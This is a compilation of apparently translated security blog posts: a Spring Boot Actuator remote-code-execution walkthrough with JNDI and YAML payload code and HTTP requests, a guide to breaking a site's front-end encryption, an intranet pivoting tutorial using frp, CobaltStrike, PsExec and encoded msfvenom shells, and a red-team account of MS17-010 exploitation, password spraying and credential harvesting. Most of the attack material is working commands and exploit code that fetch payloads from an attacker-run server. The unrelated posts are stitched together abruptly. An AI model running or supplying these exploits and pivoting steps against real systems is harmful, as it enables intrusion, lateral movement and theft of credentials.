/opt/apache-maven-3.6.2/boot/plexus-classworlds-2.6.0.jar -Dclassworlds.conf=/opt/apache-maven-3.6.2/bin/m2.conf -Dmaven.home=/opt/apache-maven-3.6.2 -Dlibrary.jansi.path=/opt/apache-maven-3.6.2/lib/jansi-native -Dmaven.multiModuleProjectDirectory=/root/actuator/actuator-testbed org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run Wait for a moment root@kali:~/actuator/actuator-testbed# netstat -ntpl |grep 8090 tcp6 0 0 :8090 :* LISTEN 33666/java root@kali:~/actuator/actuator-testbed# http://10.20.24.191:8090/ http://10.20.24.191:8090/jolokia/list ReloadByURL can load remote url xml files 'ch.qos.logback.classic': { 'Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator': { 'op': { 'reloadByURL': { 'args': [ { 'name': 'p1', 'type': 'java.net.URL', 'desc': '' } ], 'ret': 'void', 'desc': 'Operation exposed for management' } 3.http service stores logback.xml,ExportObject.class logback.xml file content configuration insertFromJNDI env-entry-name='rmi://10.20.24.191:1099/Exploit' as='appName' / /configuration ExportObject.java import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class ExportObject { public ExportObject() throws Exception { Process var1=Runtime.getRuntime().exec('touch /tmp/jas502n'); InputStream var2=var1.getInputStream(); BufferedReader var3=new BufferedReader(new InputStreamReader(var2)); String var4; while((var4=var3.readLine()) !=null) { System.out.println(var4); } var1.waitFor(); var2.close(); var3.close(); var1.destroy(); } public static void main(String[] var0) throws Exception { } } 4.RCE trigger Listen to rmi port root@kali:~/ldap_rmi# cat rmi.sh java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://10.20.24.191:8000/#ExportObject root@kali:~/ldap_rmi# ./rmi.sh * Opening JRMP listener on 1099 Have connection from /10.20.24.191:43878 Reading message. Is RMI.lookup call for ExportObject 2 Sending remote classloading stub targeting http://10.20.24.191:8000/ExportObject.class Close connection The browser access loads the remote logback.xml file for parsing, The server accesses a malicious jndi address, causing malicious bytecode code execution http://10.20.24.191:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:/!/10.20.24.191:8000!/logback.xml 5. Command execution is successful root@kali:/var/www/html# ls /tmp/j* /tmp/jas502n root@kali:/var/www/html# III. YML RCE vulnerability The method of implementing RCE through Spring environment spring.cloud.bootstrap.location property modification is more reliable This property is used to load the external configuration and parse it in YAML format. To achieve this, any POST/refresh content triggers the vulnerability. yaml_payload.yml file content: !javax.script.ScriptEngineManager [ !java.net.URLClassLoader [[ !java.net.URL ['http://10.20.24.191:8000/yaml_payload.jar'] ]] ] 1.yaml_payload.jar manufacturing Code https://github.com/artsploit/yaml-payload AwesomeScriptEngineFactory.java Part of the code import javax.script.ScriptEngine; import javax.script.ScriptEngineFactory; import java.io.IOException; import java.util.List; public class AwesomeScriptEngineFactory implements ScriptEngineFactory { public AwesomeScriptEngineFactory() { try { Runtime.getRuntime().exec('touch /tmp/success'); } catch (IOException e) { e.printStackTrace(); } } ymal_payload.jar\artsploit\AwesomeScriptEngineFactory.java Contains the actual bytecode and has a malicious payload in the constructor. ymal_payload.jar\services\javax.script.ScriptEngineFactory Just a text file containing a full reference to 'artsploit.AwesomeScriptEngineFactory' so that ServiceLoader knows where to find the class Content: artsploit.AwesomeScriptEngineFactory The jar file exists in the http server http://10.20.24.191:8090/ymal_payload.jar 2.Set spring.cloud.bootstrap.location spring.cloud.bootstrap.location=http://10.20.24.191:8090/yaml_payload.yml POST /env HTTP/1.1 Host: 10.20.24.191:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Forwarded-For: 127.0.0.1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 73 spring.cloud.bootstrap.location=http://10.20.24.191:8000/yaml_payload.yml 3.refresh post any content, RCE vulnerability triggered POST /refresh HTTP/1.1 Host: 10.20.24.191:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Forwarded-For: 127.0.0.1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 5 12312 4.RCE execution was successful root@kali:/var/www/html# ls /tmp/succ* /tmp/success root@kali:/var/www/html# Ps: Compared to Eureka's XStream payload, the yaml method can even be used in the latest version. Reference link https://www.veracode.com/blog/research/exploiting-spring-boot-actuators original link: https://github.com/jas502n/SpringBoot_Actuator_RCE

That is, after the last decryption, the development team did not give up. After a few months, the return package was also encrypted. And compressed and obfuscated front-end js According to observations, it is initially believed that the server also performs the same RSA+Aes encryption, and then sends the key and iv after RSA encrypted and the data fields encrypted by Aes together. But for us, this actually adds to the insult to the system and reduces the security of the system. Because this will allow the front-end to decrypt the rsa+aes, the rsa private key will definitely exist in the front-end! Start the operation 1. Search the encryptIv field in the old rules, find the suspected decrypted part, press the breakpoint and submit the login request Burp grabs the packet and returns the packet and extracts the data field Extract the key and iv values of the AES decrypted by RSA at the breakpoint Put n and a from the front-end breakpoint as key and iv into the Guigui JS debugging tool to try decryption. The decryption is successful, which means that there is no problem with the idea. That is, the code here decrypts the encryptIv and encryptKey from the server to the original key and offset of aes. 2. According to the decryption code, find the rsa private key (p.d), and the display is incomplete. Copy a ctrl+f to search for the complete rsa private key. Use jsencrypt.js script to decrypt and find an error. The reason is that the original js calls the browser's window and navigator methods. These two are used to obtain browser window information and mouse position information to generate random numbers Through searching, I found that someone had changed the original JSEncrypt first, removed the window and navigator methods to use it. Post address: https://bbs.125.la/forum.php?mod=viewthreadtid=14113049 Debugging successfully using Guigui JS 3. The last step is to improve the writing of automated encryption and decryption scripts. The old rules are still a combination of mitmweb+burp. The browser first proxyes to burp, and then burp secondary proxys to mitmweb to execute python scripts, and then sends them to the server. The general idea is as follows: In fact, I thought that 90% had been completed, and the remaining 10% were written to write automated scripts. As a result, this 10% took several days because of the reason why the call to js decryption was not successful. Afterwards, it is solved, and generally speaking, it has something to do with the AES algorithm, js, and python. We can talk about this big pit in detail next issue! Skip this part today. Finally, the last script added the code to cancel the front-end decryption and the code to mitmweb help decrypt the response. The debugging was successful, the burp was comfortable and the whole process was clear. By the way, huh? I found a high-risk vulnerability that returned to the front end with a verification code hahaha. But I am kind-hearted. Since this encryption and decryption will not be solved for a while, it is Friday now, so let’s call it development and fix the vulnerability next Monday. Let's leave the specific new code part until next time, let's talk about it together with AES when decrypting this big pit.

Preface When intranet penetration, a WebShell or CobaltStrike, Metasploit will be launched, etc. is just the beginning, and it is more about moving the intranet horizontally, expanding the results, and hitting the core area. However, the prerequisite for post-infiltration is to build an "exclusive channel" to the intranet in order to further attack. However, in actual combat, the use methods are different due to different network environments. The content of this article is expanded according to the following mind map Target outbound (socks proxy) This is the network environment that you are most willing to encounter in actual combat. The target machine can access the Internet normally and can directly hang the socks agent or CobaltStrike on the target machine to open up the target's intranet channel. frp(socks5) frp server configuration file [common]bind_port=8080 frp client configuration file [common]server_addr=xx.xx.xx.xxserver_port=8080#Service port Use common web ports [socks5]type=tcpremote_port=8088plugin=socks5use_encryption=trueuse_compression=true#socks5 password#plugin_user=SuperMan#plugin_passwd=XpO2McWe6nj3 The two functions of encryption and compression are added here, which are not enabled by default. According to the author's introduction, the compression algorithm uses snappy. use_encryption=true enable encryption [Encrypted transmission of communication content, effectively preventing traffic from being intercepted] use_compression=true Enable compression [transmitting content for compression, effectively reducing the transmitted network traffic and speeding up traffic forwarding, but it will consume some additional CPU resources] use_encryption=true , use_compression=true must be placed under the relevant protocol. After the frp client and configuration file are transmitted to the target machine, the program name and configuration file are modified and placed in the system-related folders to ensure concealment setg Proxies socks5:xxx.xxx.xxx.xxx.xxx:8088 Comparison of encryption compression This is the FRP client configuration file that does not use encryption and compression functions. The metaploit hangs the socks proxy is used to scan the data packets transmitted by ms17_010, which can clearly identify the specific attack behavior. If the target intranet has security equipment such as "situation awareness" and traffic analysis, it will be monitored, resulting in the loss of permissions. After using encryption and compression functions, although the attack source address will also be exposed, the transmitted data packets cannot be distinguished, avoiding the security monitoring equipment in the intranet CobaltStrike (socks4a) Go to the Beacon of the controlled target machine to enable the socks agent beacon socks 1024 #Port is set according to the actual situation of VPS View Proxy Pivots in the menu bar, connect the copy proxy to Metasploit, or directly hang socks4a in related security tools. No online machine This is the link link. As long as the main link (beacon) is disconnected, all of them will be disconnected! SMB Beacon Official introduction to SMB Beacon: SMB Beacon uses a named pipe to communicate through the parent Beacon. When two Beacons are linked, the child Beacon obtains the task from the parent Beacon and sends it. Because the linked Beacons uses Windows named pipes for communication, this traffic is encapsulated in the SMB protocol, SMB Beacon is relatively hidden. Create an SMB Listener (host and port can be ignored), pay attention to the Listener selection, and select the host-derived session that can be reached by route in the session. (Create SMB in Listner, right-click spawn as, select the corresponding Listener to go online) After successful operation, you can see the character ∞∞, which is the connection state of the derived SMB Beacon. You can disconnect it with the link host link or unlink host on the main Beacon. beacon link 192.168.144.155beacon unlink 192.168.144.155 Link Listener Create Listener on the online host. Export the executable file or dll corresponding to this type of Listener. Select the Listener you just created. Upload the paidload that has just been generated to the currently online target machine, and use the PsExec.exe tool here. (CobalStrike itself has psexec function not powerful enough) Use the PsExec tool in Beacon to upload the payload to the target machine that does not leave the network, execute it automatically, and go online. beacon shell C:\WINDOWS\Temp\PsExec.exe -accepteula\\192.168.144.155,192.168.144.196 -u administrator -p admin@123 -d -c C:\WINDOWS\Temp\beacon.exe beacon shell netstat -ano |findstr 4444 SSH Login beacon ssh 192.168.144.174:22 root adminbeacon ssh 192.168.144.203:22 root admin Checking the network connection status in the Linux target machine is actually a connection established with the previously launched Windows host. The target does not go out of the network (http proxy) There may be firewalls, network gates, etc. in the target machine network, which only allows http one-way outflow and cannot access the Internet normally. The above socks method is not feasible, and it can only be used to penetrate using http proxy. reGeorg (socks5) python reGeorgSocksProxy.py -u http://192.168.144.211/tunnel.aspx -l 0.0.0.0 -p 10080 Using metasploit to hang reGeorg socks proxy, scan the data packets transmitted by ms17_010, which can clearly identify attack behavior. Neo-reGeorg (encryption) python neoreg.py -k test@123 -l 0.0.0.0 -p 10081 -u http://192.168.144.211/neo-tunnel.aspx After using Neo-reGeorg, the packet has been encrypted and transmitted. Ice Scorpion (open socks5) Ice Scorpion's packet transmission is encrypted and it also has the function of socks proxy, but there is packet loss during the transmission process. Here we also use metasploit to detect the ms17_010 vulnerability, but the result shows that it does not exist. When no proxy detection is set, the actual vulnerability exists. Although the proxy scanning method of Ice Scorpion is not as accurate as reGeorg, port detection of small threads is feasible, such as auxiliary/scanner/portscan/tcp. Accuracy is more determined by the number of packets in some detection or other way of transmission. reduh (single-port forwarding) reduh usage: https://blog.csdn.net/nzjdsds/article/details/82930774 When the service version of the target server middleware and other services is low and reGeorg or Ice Scorpion Horse cannot resolve normally, you need to use other http proxy scripts. This is the environment encountered in a practical battle: Take reduh as an example here. Although only forwarding the specified port (graphical connection operation is not applicable), you can first use msfvenom to generate a forward shell payload, then combine reduh single-port forwarding to launch metasploit, and finally use the socks4a module to open the proxy. Let’s go through the specific process below: sudo msfvenom --platform windows -p windows/shell_bind_tcp lport=53 -e x86/shikata_ga_nai -i 5 -f exe -o x86shell.exe#--platform platform Specify the target platform for payload #-e, --encoder encoder Specify the encoder to use #-i, --iterations count Specify the number of encoding times of payload Upload the payload to the target server and execute. metasploit is the address and port after listening for forwarding. sudo msfconsole -qmsf5 use exploit/multi/handlermsf5 exploit(multi/handler) setpayload windows/shell_bind_tcpmsf5 exploit(multi/handler) setrhost 127.0.0.1msf5 exploit(multi/handler) setlport 5353msf5 exploit(multi/handler) run -j java -jar reDuhClient.jar http://103.242.xx.xx/reduh.aspxtelnet 127.0.0.1 1010[createTunnel]5353:127.0.0.1:53 It can penetrate in metasploit, or turn on a socks4a, and mount other security tools to continue penetration. msf5 exploit(multi/handler) use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) setsrvport 10080msf5 auxiliary(server/socks4a) run -j Notice Why do payload use shell instead of meterpreter? Meterpreter is a high-level payload that occupies a large number of data packets during transmission. This single-port forwarding is not very stable at all. Meterpreter will make the "small water pipe" more unstable! Isolated Network (Multi-level Agent) In the intranet penetration, there will be isolated networks, which are often logically isolated. The breakthrough method is to obtain the permissions of the route-accessible springboard machine (multiple network cards, operation and maintenance machines, etc.) and establish a first-level second-level agent and a third-level agent. frp Now you have obtained the permission of a dual network card intranet server, and you can use FRP to establish a channel. This server is both a server and a client. (For details, refer to https://www.cnblogs.com/PANDA-Mosen/p/13096260.html) proxifier After the establishment is done with FRP, add two proxyings in combination with proxifier: external network socks and internal network socks, and then create a proxy chain. (Note the proxy order) Set proxy rules and select the corresponding proxy. The second-layer agent was successful, and the detection of the intranet isolator 445 is opened. Proxychains Command line proxy artifact proxychains, setting the second-layer proxy and socks password. (Note the proxy order) Linked metasploit, ms17_010 detection, you can see the transmission process of the proxy chain. For the utilization of metasploit, as long as the route in sessions is accessible, multi-layer network penetration can be directly carried out, which is more convenient. But the main session is dropped, all of them are dropped! After obtaining a session of the target, you can view the IP segment information and automatically add the routing table. msf5 exploit(multi/handler) sessions 1meterpreter run get_local_subnetsmeterpreter run autoroute -pmeterpreter run post/multi/manage/autoroutemeterpreter run autoroute -pmeterpreter background The above is added in the meterpreter permission, or when the target routing table information is known, you can add it directly. msf5 exploit(multi/handler) route add 172.20.20.0/24 1//session id 1msf5 exploit(multi/handler) route You can continue to penetrate metasploit, or turn on a socks and mount other tools to penetrate multiple layers. msf5 exploit(multi/handler) use auxiliary/server/socks4amsf5 auxiliary(server/socks4a) setsrvport 1080msf5 auxiliary(server/socks4a) run -j and then open /etc/proxychains.conf Original link: https://www.cnblogs.com/yokan/p/14057794.html

Preface During an offensive and defensive drill, the team first got a Webshell, and then bounced the permissions to CobaltStrike to facilitate me to intranet penetration: By discovering that the current machine is a public network server, only the public network IP: xxx.xxx.xxx.16 By viewing the arp cache, I found that there are currently some public network machines: By querying these IPs, it is found that it is a 'a network', and through Nbtscan, it is found that the current C segment has a host that survives: (It is initially determined that the current C segment machine may have a domain, but it is not sure) Move horizontally the C segment of the current first layer of intranet machine Since it is an offensive and defensive drill, the more points you get, the better. I don’t consider some other issues here. After getting the current machine, I caught the plaintext password: However, using this password to use MSF to spray the C segment through password, it was found that no host was successfully horizontally: At this moment, I scanned again to see if there is any MS17010: (Generally speaking, there are basically several Eternal Blues for this kind of 'Xiang.com', so just scan it) I found that the three units 92, 151, and 200 existed in MS17010, and then called 92 this unit: Then MSF and CS were linked, and I popped the MSF shell to Cs again and maintained permissions: At this time, it is enough to use these two springboard machines. There is no need to continue to fight the other two MS17010. Then I collected information on the current C segment and scanned the web assets to survive and found a large number of web assets: Through manual analysis, a SQL injection was found, and it was DBA permission: Then an administrator user was added and then turned on 3389 (because of Norton, I don’t have time to do it for regular free kills, so I mainly got points, so I simply logged into the server directly) And I can't connect directly through socks, which feels like a restriction. Later I found that using mstsc /admin can be logged in: At this time, I used 92 this machine as a springboard to log in remotely to the 71 desktop: The administrator's desktop was cloned: At this time, log in to the previously added account and go to the remote desktop. It is the administrator's desktop: Through a series of information collection and password collection, we obtained the permissions of Mssql and all side stations: Through the collected password, continue spraying the password on segment C successfully. Mssql: xxx.xxx.xxx.239 Then, I directly call XP_cmdshell to execute the command, and found that the permissions are still very large: Then use bitsadmin to go online to cs: At this time, the permissions of these three machines: 16, 92, and 239 were obtained, but the intranet was not discovered yet, and I was caught in a bottleneck at this time. After getting to this point, I found that it was impossible to move horizontally. I don’t want to use 0day to hit other webs. I turned around and used MS17010 to hit 200 this one: Then, in the same way, the shell was popped to CS and the user was added and the remote desktop group was added: Then login found that login failed: At this time, using mstsc/admin can bypass and successfully log in to the target remote desktop: The administrator's desktop was cloned in the same way: I found a lot of valuable things, such as mstsc login records: Get the navicat database credentials: and found that there are many SSH in Xshell: All Linux hosts can be logged in. At this time, you only need to use SharpDecryptPwd to grab their passwords, but a problem was found: Use this thing to check the password later: (I didn’t want to use these things, so it’s too troublesome to check the password one by one) I found that there are several machines with 10 intranets: Use the existing password to spray the Linux host in segment C horizontally: Then popped a few shells to MSF: So far, the C segment of this public network has basically been penetrated, and a large number of core databases, switches, and web servers have been taken down. The next step is to intranet penetration of 10 intranets. Intranet penetration from the second layer of intranet 10 segments Because I have obtained the root password, I directly scanned the B section of 10.10.10.1/16. There are a large wave of assets. I won’t take a screenshot here. There are hundreds of them, and I found that there are ESXI: And got an access control system: took down two SSHs of 10 segments horizontally through special means, and found that the third layer of intranet is 192 segments and docker environment: Since there is ESXI in 10 segments, I directly used the vulnerability to get the ESXI cloud platform, and all of its machines were accused: At this time, the 10th section has basically been penetrated, and the next step is to penetrate the intranet of 192. Intranet penetration from the third layer of intranet segment 192 I simply scanned the 192 paragraph through regular fscan and found that 192 assets are also very fat: Then two vulnerabilities of MS17010 were found: Now we have sorted out the relationship, and the current environment is as follows: Original link: https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==mid=2247491421idx=1sn=769d715d05057112eb4ee1ebb8312e37chksm=c172c541f6054c571e482d42 83f946625f2689ec6214e9d47a61c66399ee7d2cd2a62c0de464scene=123key=f3d6282f44b990e0f2527af4db8e088f25f3e43d0abaf5f845ff52e14965e4fe188c890